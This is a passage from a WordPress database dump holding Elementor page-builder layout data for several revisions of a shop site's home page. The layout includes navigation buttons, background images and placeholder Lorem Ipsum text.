\",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"e7e4c38\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#7EB087\",\"background_color_b\":\"#014C0B\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"3778299\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"c923623\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#7EB087\",\"background_color_b\":\"#014C0B\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"916798d\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f78ed1a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"39b0f4e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e9c825a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":125,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"acb2826\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"84a32d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"89a82b4\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36bc667\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"bb02c40\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0769ef1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"75ce5f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f527d10\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7899f3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8274f01\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0f6b27e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70a66d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"ae8a1a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"fd8def6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91ca2f8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a36dcd9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"125f124\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"508fa7c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4ddf161\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36cae65\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(7871,1402,'_elementor_page_assets','a:0:{}'),(7873,1403,'_elementor_edit_mode','builder'),(7874,1403,'_elementor_template_type','wp-page'),(7875,1403,'_elementor_version','3.7.6'),(7876,1403,'_wp_page_template','elementor_canvas'),(7877,1403,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":34.872},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":15.023},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":15.042999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":15.044},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7fab8ef\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"stretch_section\":\"section-stretched\",\"structure\":\"22\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-55,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"284\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"728be13\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":92.108999999999995},\"elements\":[{\"id\":\"0ea21e0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Lorem Ipsum is simply dummy tex \",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Saira Stencil One\",\"typography_font_size\":{\"unit\":\"px\",\"size\":22,\"sizes\":[]},\"typography_font_weight\":\"100\",\"text_stroke_text_stroke_type\":\"yes\",\"text_stroke_text_stroke\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"text_stroke_stroke_color\":\"#FFFFFF\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"color\":\"rgba(68.25, 44.95597826086957, 44.95597826086957, 0.3)\"},\"_margin\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"122\",\"bottom\":\"0\",\"left\":\"423\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"21726cb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"3\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98f9256\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":7.1929999999999996},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5b7eb71\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":664,\"sizes\":[]},\"structure\":\"30\",\"margin\":{\"unit\":\"px\",\"top\":\"-62\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"3e91b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#7EB087\",\"background_color_b\":\"#014C0B\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"1976daf\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"e7e4c38\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#7EB087\",\"background_color_b\":\"#014C0B\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"3778299\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"c923623\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#7EB087\",\"background_color_b\":\"#014C0B\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"916798d\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f78ed1a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"39b0f4e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e9c825a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":125,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"acb2826\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"84a32d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"89a82b4\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36bc667\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"bb02c40\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0769ef1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"75ce5f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f527d10\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7899f3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8274f01\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0f6b27e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70a66d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"ae8a1a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"fd8def6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91ca2f8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a36dcd9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"125f124\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"508fa7c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4ddf161\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36cae65\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(7878,1403,'_elementor_page_assets','a:0:{}'),(7880,1404,'_elementor_edit_mode','builder'),(7881,1404,'_elementor_template_type','wp-page'),(7882,1404,'_elementor_version','3.7.6'),(7883,1404,'_wp_page_template','elementor_canvas'),(7884,1404,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7fab8ef\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"stretch_section\":\"section-stretched\",\"structure\":\"22\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-55,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"284\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"728be13\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":92.108999999999995},\"elements\":[{\"id\":\"0ea21e0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Lorem Ipsum is simply dummy tex \",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Saira Stencil One\",\"typography_font_size\":{\"unit\":\"px\",\"size\":22,\"sizes\":[]},\"typography_font_weight\":\"100\",\"text_stroke_text_stroke_type\":\"yes\",\"text_stroke_text_stroke\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"text_stroke_stroke_color\":\"#FFFFFF\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"color\":\"rgba(68.25, 44.95597826086957, 44.95597826086957, 0.3)\"},\"_margin\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"122\",\"bottom\":\"0\",\"left\":\"423\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"21726cb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"3\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98f9256\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":7.1929999999999996},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5b7eb71\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":664,\"sizes\":[]},\"structure\":\"30\",\"margin\":{\"unit\":\"px\",\"top\":\"-62\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"3e91b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#7EB087\",\"background_color_b\":\"#014C0B\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"1976daf\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, 